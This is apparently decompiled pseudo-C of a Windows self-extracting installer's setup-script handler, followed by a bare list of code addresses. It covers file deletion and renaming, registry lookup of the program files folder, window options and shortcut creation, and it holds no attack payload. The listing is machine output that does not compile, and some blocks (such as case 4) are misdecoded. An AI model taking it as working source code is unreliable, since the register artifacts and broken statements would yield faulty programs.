					_t287 =  *((intOrPtr*)(_t311 + 0x10));
					do {
						_t231 = _t311 - 0x3508;
						_t306 = _t311 - 0x1bd58;
						_t302 = 6;
						goto L4;
						L6:
						while(E000717AC(_t311 - 0xfd58,  *((intOrPtr*)(0x9e618 + _t307 * 4))) != 0) {
							_t307 = _t307 + 1;
							if(_t307 < 0xe) {
								continue;
							} else {
								goto L175;
							}
						}
						if(_t307 > 0xd) {
							goto L175;
						}
						switch( *((intOrPtr*)(_t307 * 4 +  &M0007CAA1))) {
							case 0:
								__eflags = _t287 - 2;
								if(_t287 == 2) {
									E00079DA4(_t311 - 0x7d50, 0x800);
									E0006A49D(E0006B965(_t311 - 0x7d50, _t311 - 0x3508, _t311 - 0xdd58, 0x800), _t287, _t311 - 0x8d58, _t307);
									 *(_t311 - 4) = 0;
									E0006A5D7(_t311 - 0x8d58, _t311 - 0xdd58);
									E000670BF(_t311 - 0x5d50);
									while(1) {
										_push(0);
										_t295 = _t311 - 0x8d58;
										_t249 = E0006A52A(_t311 - 0x8d58, _t300, _t311 - 0x5d50);
										__eflags = _t249;
										if(_t249 == 0) {
											break;
										}
										SetFileAttributesW(_t311 - 0x5d50, 0);
										__eflags =  *(_t311 - 0x4d44);
										if(__eflags == 0) {
											L18:
											_t253 = GetFileAttributesW(_t311 - 0x5d50);
											__eflags = _t253 - 0xffffffff;
											if(_t253 == 0xffffffff) {
												continue;
											}
											_t255 = DeleteFileW(_t311 - 0x5d50);
											__eflags = _t255;
											if(_t255 != 0) {
												continue;
											} else {
												_t309 = 0;
												_push(0);
												goto L22;
												L22:
												E0006400A(_t311 - 0x1108, 0x800, L"%s.%d.tmp", _t311 - 0x5d50);
												_t313 = _t313 + 0x14;
												_t260 = GetFileAttributesW(_t311 - 0x1108);
												__eflags = _t260 - 0xffffffff;
												if(_t260 != 0xffffffff) {
													_t309 = _t309 + 1;
													__eflags = _t309;
													_push(_t309);
													goto L22;
												} else {
													_t263 = MoveFileW(_t311 - 0x5d50, _t311 - 0x1108);
													__eflags = _t263;
													if(_t263 != 0) {
														MoveFileExW(_t311 - 0x1108, 0, 4);
													}
													continue;
												}
											}
										}
										E0006B4F7(_t295, __eflags, _t311 - 0x7d50, _t311 - 0x1108, 0x800);
										E0006B207(__eflags, _t311 - 0x1108, 0x800);
										_t310 = E000835B3(_t311 - 0x7d50);
										__eflags = _t310 - 4;
										if(_t310 < 4) {
											L16:
											_t274 = E0006B925(_t311 - 0x3508);
											__eflags = _t274;
											if(_t274 != 0) {
												break;
											}
											L17:
											_t277 = E000835B3(_t311 - 0x5d50);
											__eflags = 0;
											 *((short*)(_t311 + _t277 * 2 - 0x5d4e)) = 0;
											E0007F350(0x800, _t311 - 0x40, 0, 0x1e);
											_t313 = _t313 + 0x10;
											 *((intOrPtr*)(_t311 - 0x3c)) = 3;
											_push(0x14);
											_pop(_t280);
											 *((short*)(_t311 - 0x30)) = _t280;
											 *((intOrPtr*)(_t311 - 0x38)) = _t311 - 0x5d50;
											_push(_t311 - 0x40);
											 *0xc2074();
											goto L18;
										}
										_t285 = E000835B3(_t311 - 0x1108);
										__eflags = _t310 - _t285;
										if(_t310 > _t285) {
											goto L17;
										}
										goto L16;
									}
									 *(_t311 - 4) =  *(_t311 - 4) | 0xffffffff;
									E0006A4B3(_t311 - 0x8d58);
								}
								goto L175;
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax =  *0xbdc84;
									__eflags =  *0xbdc84;
									__ebx = __ebx & 0xffffff00 |  *0xbdc84 == 0x00000000;
									__eflags = __bl;
									if(__bl == 0) {
										__eax =  *0xbdc84;
										_pop(__ecx);
										_pop(__ecx);
									}
									__bh =  *((intOrPtr*)(__ebp - 0xd));
									__eflags = __bh;
									if(__eflags == 0) {
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										__esi = E0007AB9A(__ecx, __edx, __eflags);
										__eax =  *0xbdc84;
									} else {
										__esi = __ebp - 0x3508;
									}
									__eflags = __bl;
									if(__bl == 0) {
										__edi = __eax;
									}
									__eax = E000835B3(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xbdc84);
									__eax = E000835DE(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0xbdc84 = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E00087168(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L000835CE(__esi);
									}
								}
								goto L175;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
								}
								goto L175;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L175;
								}
								__eflags =  *0xaa472 - __di;
								if( *0xaa472 != __di) {
									goto L175;
								}
								__eax = 0;
								__edi = __ebp - 0x3508;
								_push(0x22);
								 *(__ebp - 0x1108) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x3508) - __ax;
								if( *(__ebp - 0x3508) == __ax) {
									__edi = __ebp - 0x3506;
								}
								__eax = E000835B3(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L175;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L52:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x1108 = E0006FE56(__ebp - 0x1108, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x1108;
											__eax = E000817CB(__ebp - 0x1108, __ebp - 0x1108);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *(__eax + 2) - __bx;
												if( *(__eax + 2) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x1108;
											__edi = 0xaa472;
											E0006FE56(0xaa472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
											__eax = E0007A8D0(__ebp - 0x1108, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xaa472); // executed
											__eax = __ebp - 0x1108;
											__eax = E000835E9(__ebp - 0x1108, 0xaa472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
											}
											goto L175;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x1c;
											__ebx = 0;
											_push(__ebp - 0x1c);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xc2028();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x1108;
												_push(__ebp - 0x1108);
												__eax = __ebp - 0x20;
												_push(__ebp - 0x20);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x1c));
												__eax =  *0xc2024();
												_push( *(__ebp - 0x1c));
												 *0xc2004() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x1108) = __cx;
											}
											__eflags =  *(__ebp - 0x1108) - __bx;
											if( *(__ebp - 0x1108) != __bx) {
												__eax = __ebp - 0x1108;
												__eax = E000835B3(__ebp - 0x1108);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x1108 = E0006FE2E(__eflags, __ebp - 0x1108, "\\", __esi);
												}
											}
											__esi = E000835B3(__edi);
											__eax = __ebp - 0x1108;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x1108 = E0006FE2E(__eflags, __ebp - 0x1108, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L52;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L175;
									}
									__ebp - 0x1108 = E0006FE56(__ebp - 0x1108, __edi, 0x800);
									goto L65;
								}
							case 4:
								__eflags =  *0xaa46c - 1;
								__eflags = __eax - 0xaa46c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *__edi & __cl;
								_pop(es);
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0xa8453 = __cl;
									 *0xa8460 = 1;
									goto L175;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xa8453 = __cl;
									L81:
									 *0xa8460 = __cl;
									goto L175;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L175;
								}
								 *0xa8453 = 1;
								goto L81;
							case 6:
								__edi = 0;
								 *0xbec98 = 1;
								__edi = 1;
								__ebx = __ebp - 0x3508;
								__eflags =  *(__ebp - 0x3508) - 0x3c;
								if( *(__ebp - 0x3508) != 0x3c) {
									L99:
									__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
									if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
										L102:
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
										if( *((intOrPtr*)(__ebp + 0x10)) == 4) {
											__eflags = __esi - 6;
											if(__esi == 6) {
												__eax = 0;
												_push(0);
												_push(__edi);
												_push(__ebx);
												_push( *(__ebp + 8));
												__eax = E0007CE22(__ebp);
											}
										}
										goto L175;
									}
									__eflags = __esi - 9;
									if(__esi != 9) {
										goto L175;
									}
									_push(1);
									_push(__edi);
									_push(__ebx);
									_push( *(__ebp + 8));
									__eax = E0007CE22(__ebp);
									goto L102;
								}
								__eax = __ebp - 0x3506;
								_push(0x3e);
								_push(__ebp - 0x3506);
								__eax = E000815E8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L99;
								}
								_t109 = __eax + 2; // 0x2
								__ecx = _t109;
								 *(__ebp - 0x14) = _t109;
								__ecx = 0;
								__eflags = 0;
								 *__eax = __cx;
								__eax = __ebp - 0x108;
								_push(0x64);
								_push(__ebp - 0x108);
								__eax = __ebp - 0x3506;
								_push(__ebp - 0x3506);
								while(1) {
									__ebx = E0007A6C7();
									__eflags = __ebx;
									if(__ebx == 0) {
										break;
									}
									__eflags =  *(__ebp - 0x108);
									if( *(__ebp - 0x108) == 0) {
										break;
									}
									__eax = __ebp - 0x108;
									__eax = E000717AC(__ebp - 0x108, L"HIDE");
									__eax =  ~__eax;
									asm("sbb eax, eax");
									__edi = __edi & __eax;
									__eax = __ebp - 0x108;
									__eax = E000717AC(__ebp - 0x108, L"MAX");
									__eflags = __eax;
									if(__eax == 0) {
										_push(3);
										_pop(__edi);
									}
									__eax = __ebp - 0x108;
									__eax = E000717AC(__ebp - 0x108, L"MIN");
									__eflags = __eax;
									if(__eax == 0) {
										_push(6);
										_pop(__edi);
									}
									_push(0x64);
									__eax = __ebp - 0x108;
									_push(__ebp - 0x108);
									_push(__ebx);
								}
								__ebx =  *(__ebp - 0x14);
								goto L99;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L125:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xaa46c;
										if( *0xaa46c == 0) {
											 *0xaa46c = 2;
										}
										 *0xa9468 = 1;
									}
									goto L175;
								}
								__eax = __ebp - 0x7d50;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
								E0006B207(__eflags, __ebp - 0x7d50, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0x9e5f8);
									__ebp - 0x7d50 = E0006400A(0xa946a, __edi, L"%s%s%u", __ebp - 0x7d50);
									__eax = E0006A180(0xa946a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xa946a);
								__eflags =  *(__ebp - 0x3508);
								if( *(__ebp - 0x3508) == 0) {
									goto L175;
								}
								__eflags =  *0xb6b7a;
								if( *0xb6b7a != 0) {
									goto L175;
								}
								__eax = 0;
								 *(__ebp - 0x1508) = __ax;
								__eax = __ebp - 0x3508;
								_push(0x2c);
								_push(__ebp - 0x3508);
								__eax = E000815E8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L121:
									__eflags =  *(__ebp - 0x1508);
									if( *(__ebp - 0x1508) == 0) {
										__ebp - 0x1bd58 = __ebp - 0x3508;
										E0006FE56(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
										__ebp - 0x1508 = E0006FE56(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
									}
									__ebp - 0x3508 = E0007A4F2(__ebp - 0x3508);
									__eax = 0;
									 *(__ebp - 0x2508) = __ax;
									__ebp - 0x1508 = __ebp - 0x3508;
									__eax = E00079F35( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L175;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0xa8450 = 1;
										 *0xa946a = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L125;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x3508) - __dx;
								if( *(__ebp - 0x3508) == __dx) {
									goto L121;
								}
								__ecx = 0;
								__eax = __ebp - 0x3508;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x3508;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x3508 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L121;
								}
								__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
								__ebp - 0x1508 = E0006FE56(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x3508) = __ax;
								goto L121;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x3508) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x3508;
										_push(__ebp - 0x3508);
										__eax = E00087107(__ebx, __edi);
										_pop(__ecx);
										 *0xbec94 = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xbec90 = E0007AB9A(__ecx, __edx, __eflags);
								}
								 *0xb6b7b = 1;
								goto L175;
							case 9:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L175;
								}
								__eax = 0;
								 *(__ebp - 0x4d08) = __ax;
								__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
								__eax = E00086420( *(__ebp - 0x1bd58) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0xbbb82);
									__eax = __ebp - 0x4d08;
									_push(__ebp - 0x4d08);
									__eax = E0006FE56();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x4d08;
									if(__eflags == 0) {
										_push(0xbab82);
										_push(__eax);
										__eax = E0006FE56();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0xbcb82);
										_push(__eax);
										__eax = E0006FE56();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9d58) = __ax;
								 *(__ebp - 0x3d08) = __ax;
								__ebp - 0x19d58 = __ebp - 0x6d50;
								__eax = E000857E6(__ebp - 0x6d50, __ebp - 0x19d58);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6d50) - __bx;
								if( *(__ebp - 0x6d50) != __bx) {
									__ebp - 0x6d50 = E0006A180(__ebp - 0x6d50);
									__eflags = __al;
									if(__al != 0) {
										goto L160;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6d50;
									__eflags =  *(__ebp - 0x6d50) - __bx;
									if( *(__ebp - 0x6d50) == __bx) {
										goto L160;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L148:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6d50 = E0006A180(__ebp - 0x6d50);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L156:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L157;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x3d08;
												L154:
												_push(__eax);
												__eax = E000857E6();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L156;
											}
											 *(__ebp - 0x3d08) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x3d06;
											goto L154;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L157;
										}
										goto L148;
										L157:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L160;
								} else {
									__ebp - 0x19d56 = __ebp - 0x6d50;
									E000857E6(__ebp - 0x6d50, __ebp - 0x19d56) = __ebp - 0x6d4e;
									_push(__ebx);
									_push(__ebp - 0x6d4e);
									__eax = E000815E8(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x3d08 = E000857E6(__ebp - 0x3d08, __ebp - 0x3d08);
										_pop(__ecx);
										_pop(__ecx);
									}
									L160:
									__eflags =  *((short*)(__ebp - 0x11d58));
									__ebx = 0x800;
									if( *((short*)(__ebp - 0x11d58)) != 0) {
										__ebp - 0x9d58 = __ebp - 0x11d58;
										__eax = E0006B239(__ebp - 0x11d58, __ebp - 0x9d58, 0x800);
									}
									__ebp - 0xbd58 = __ebp - 0x6d50;
									__eax = E0006B239(__ebp - 0x6d50, __ebp - 0xbd58, __ebx);
									__eflags =  *(__ebp - 0x4d08);
									if(__eflags == 0) {
										__ebp - 0x4d08 = E0007AB2E(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14));
									}
									__ebp - 0x4d08 = E0006B207(__eflags, __ebp - 0x4d08, __ebx);
									__eflags =  *((short*)(__ebp - 0x17d58));
									if(__eflags != 0) {
										__ebp - 0x17d58 = __ebp - 0x4d08;
										E0006FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __ebx) = __ebp - 0x4d08;
										__eax = E0006B207(__eflags, __ebp - 0x4d08, __ebx);
									}
									__ebp - 0x4d08 = __ebp - 0xcd58;
									__eax = E000857E6(__ebp - 0xcd58, __ebp - 0x4d08);
									__eflags =  *(__ebp - 0x13d58);
									__eax = __ebp - 0x13d58;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19d58;
									}
									__ebp - 0x4d08 = E0006FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __ebx);
									__eax = __ebp - 0x4d08;
									__eflags = E0006B493(__ebp - 0x4d08);
									if(__eflags == 0) {
										L170:
										__ebp - 0x4d08 = E0006FE2E(__eflags, __ebp - 0x4d08, L".lnk", __ebx);
										goto L171;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L171:
											_push(1);
											__eax = __ebp - 0x4d08;
											_push(__ebp - 0x4d08);
											E0006A04F(__ecx, __ebp) = __ebp - 0xbd58;
											__ebp - 0xad58 = E000857E6(__ebp - 0xad58, __ebp - 0xbd58);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xad58 = E0006BCCF(__eflags, __ebp - 0xad58);
											__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
											__eax = __ebp - 0x3d08;
											__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
											__edx = __ebp - 0x9d58;
											__esi = __ebp - 0xad58;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
											 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
											 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
											__eax = __ebp - 0x15d58;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi;
											E0007A5E4(__ebp - 0x15d58) = __ebp - 0x4d08;
											__ebp - 0xbd58 = E00079BDC(__ecx, __edi, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08);
											__eflags =  *(__ebp - 0xcd58);
											if( *(__ebp - 0xcd58) != 0) {
												_push(__edi);
												__eax = __ebp - 0xcd58;
												_push(__ebp - 0xcd58);
												_push(5);
												_push(0x1000);
												__eax =  *0xc2078();
											}
											goto L175;
										}
										goto L170;
									}
								}
							case 0xa:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xaa470 = 1;
								}
								goto L175;
							case 0xb:
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__eax = E00086420( *(__ebp - 0x3508) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xa8461 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xa8462 = 1;
									} else {
										__eax = 0;
										 *0xa8461 = __al;
										 *0xa8462 = __al;
									}
								}
								goto L175;
							case 0xc:
								 *0xbec99 = 1;
								__eax = __eax + 0xbec99;
								_t123 = __esi + 0x39;
								 *_t123 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t123;
								__ebp = 0xffffcaf8;
								if( *_t123 != 0) {
									_t125 = __ebp - 0x3508; // 0xffff95f0
									__eax = _t125;
									_push(_t125);
									 *0x9e5fc = E00071798();
								}
								goto L175;
						}
						L4:
						_push(0x1000);
						_push(_t306);
						_push(_t231);
						_t231 = E0007A6C7();
						_t306 = _t306 + 0x2000;
						_t302 = _t302 - 1;
						if(_t302 != 0) {
							goto L4;
						} else {
							_t307 = _t302;
							goto L6;
						}
						L175:
						_push(0x1000);
						_t216 = _t311 - 0x15; // 0xffffcae3
						_t217 = _t311 - 0xd; // 0xffffcaeb
						_t218 = _t311 - 0x3508; // 0xffff95f0
						_t219 = _t311 - 0xfd58; // 0xfffecda0
						_push( *((intOrPtr*)(_t311 + 0xc)));
						_t226 = E0007AA36();
						_t287 =  *((intOrPtr*)(_t311 + 0x10));
						 *((intOrPtr*)(_t311 + 0xc)) = _t226;
					} while (_t226 != 0);
				}
			}

0x0007bdf5
0x0007bdfa
0x0007bdff
0x0007be04
0x0007be0d
0x0007ca90
0x0007ca93
0x0007ca9d
0x0007ca9d
0x0007be13
0x0007be1b
0x0007be1f
0x0007be26
0x0007be2d
0x0007be2e
0x0007be31
0x0007be38
0x0007be3d
0x0007be44
0x0007be49
0x0007be4b
0x0007be51
0x0007be57
0x0007be57
0x00000000
0x0007be71
0x0007be88
0x0007be8c
0x00000000
0x0007be8e
0x00000000
0x0007be8e
0x0007be8c
0x0007be96
0x00000000
0x00000000
0x0007be9c
0x00000000
0x0007bea3
0x0007bea6
0x0007beb9
0x0007bedf
0x0007bef3
0x0007bef6
0x0007bf01
0x0007c045
0x0007c045
0x0007c04d
0x0007c053
0x0007c058
0x0007c05a
0x00000000
0x00000000
0x0007bf13
0x0007bf19
0x0007bf1f
0x0007bfc5
0x0007bfcc
0x0007bfd2
0x0007bfd5
0x00000000
0x00000000
0x0007bfde
0x0007bfe4
0x0007bfe6
0x00000000
0x0007bfe8
0x0007bfe8
0x0007bfea
0x0007bfeb
0x0007bfef
0x0007c003
0x0007c008
0x0007c012
0x0007c018
0x0007c01b
0x0007bfed
0x0007bfed
0x0007bfee
0x00000000
0x0007c01d
0x0007c02b
0x0007c031
0x0007c033
0x0007c03f
0x0007c03f
0x00000000
0x0007c033
0x0007c01b
0x0007bfe6
0x0007bf34
0x0007bf41
0x0007bf52
0x0007bf55
0x0007bf58
0x0007bf6b
0x0007bf72
0x0007bf77
0x0007bf79
0x00000000
0x00000000
0x0007bf7f
0x0007bf86
0x0007bf8b
0x0007bf90
0x0007bf9c
0x0007bfa1
0x0007bfa4
0x0007bfab
0x0007bfad
0x0007bfae
0x0007bfb8
0x0007bfbe
0x0007bfbf
0x00000000
0x0007bfbf
0x0007bf61
0x0007bf67
0x0007bf69
0x00000000
0x00000000
0x00000000
0x0007bf69
0x0007c060
0x0007c06a
0x0007c06a
0x00000000
0x00000000
0x0007c074
0x0007c076
0x0007c07c
0x0007c081
0x0007c083
0x0007c086
0x0007c088
0x0007c095
0x0007c09a
0x0007c09b
0x0007c09b
0x0007c09c
0x0007c09f
0x0007c0a1
0x0007c0ab
0x0007c0ae
0x0007c0b4
0x0007c0b6
0x0007c0a3
0x0007c0a3
0x0007c0a3
0x0007c0bb
0x0007c0bd
0x0007c0c6
0x0007c0c6
0x0007c0c9
0x0007c0ce
0x0007c0d7
0x0007c0d8
0x0007c0de
0x0007c0e3
0x0007c0e6
0x0007c0e8
0x0007c0ea
0x0007c0ef
0x0007c0f1
0x0007c0f3
0x0007c0f3
0x0007c0f5
0x0007c0f5
0x0007c0fa
0x0007c0ff
0x0007c100
0x0007c100
0x0007c101
0x0007c103
0x0007c10a
0x0007c10f
0x0007c103
0x00000000
0x00000000
0x0007c115
0x0007c117
0x0007c127
0x0007c127
0x00000000
0x00000000
0x0007c132
0x0007c134
0x00000000
0x00000000
0x0007c13a
0x0007c141
0x00000000
0x00000000
0x0007c147
0x0007c149
0x0007c14f
0x0007c151
0x0007c158
0x0007c159
0x0007c160
0x0007c162
0x0007c162
0x0007c169
0x0007c16e
0x0007c174
0x0007c176
0x00000000
0x0007c17c
0x0007c17c
0x0007c17f
0x0007c181
0x0007c182
0x0007c185
0x0007c1ae
0x0007c1ae
0x0007c1b1
0x0007c296
0x0007c29f
0x0007c2a4
0x0007c2a4
0x0007c2a6
0x0007c2a6
0x0007c2a8
0x0007c2aa
0x0007c2b1
0x0007c2b6
0x0007c2b7
0x0007c2b8
0x0007c2ba
0x0007c2bc
0x0007c2c0
0x0007c2c2
0x0007c2c2
0x0007c2c4
0x0007c2c4
0x0007c2c0
0x0007c2c8
0x0007c2ce
0x0007c2db
0x0007c2e2
0x0007c2f2
0x0007c2fc
0x0007c30a
0x0007c310
0x0007c318
0x0007c31d
0x0007c31e
0x0007c31f
0x0007c321
0x0007c335
0x0007c335
0x00000000
0x0007c321
0x0007c1b7
0x0007c1ba
0x0007c1c7
0x0007c1c7
0x0007c1ca
0x0007c1cc
0x0007c1cd
0x0007c1cf
0x0007c1d0
0x0007c1d5
0x0007c1da
0x0007c1e0
0x0007c1e2
0x0007c1e4
0x0007c1e7
0x0007c1ee
0x0007c1ef
0x0007c1f5
0x0007c1f6
0x0007c1f9
0x0007c1fa
0x0007c1fb
0x0007c200
0x0007c203
0x0007c209
0x0007c212
0x0007c215
0x0007c21a
0x0007c21c
0x0007c21e
0x0007c220
0x0007c220
0x0007c222
0x0007c222
0x0007c224
0x0007c224
0x0007c22c
0x0007c233
0x0007c235
0x0007c23c
0x0007c242
0x0007c244
0x0007c245
0x0007c24d
0x0007c25c
0x0007c25c
0x0007c24d
0x0007c267
0x0007c269
0x0007c278
0x0007c27e
0x0007c284
0x0007c28f
0x0007c28f
0x00000000
0x0007c284
0x0007c1bc
0x0007c1c1
0x00000000
0x00000000
0x00000000
0x0007c1c1
0x0007c187
0x0007c18b
0x00000000
0x00000000
0x0007c18d
0x0007c190
0x0007c192
0x0007c195
0x00000000
0x00000000
0x0007c1a4
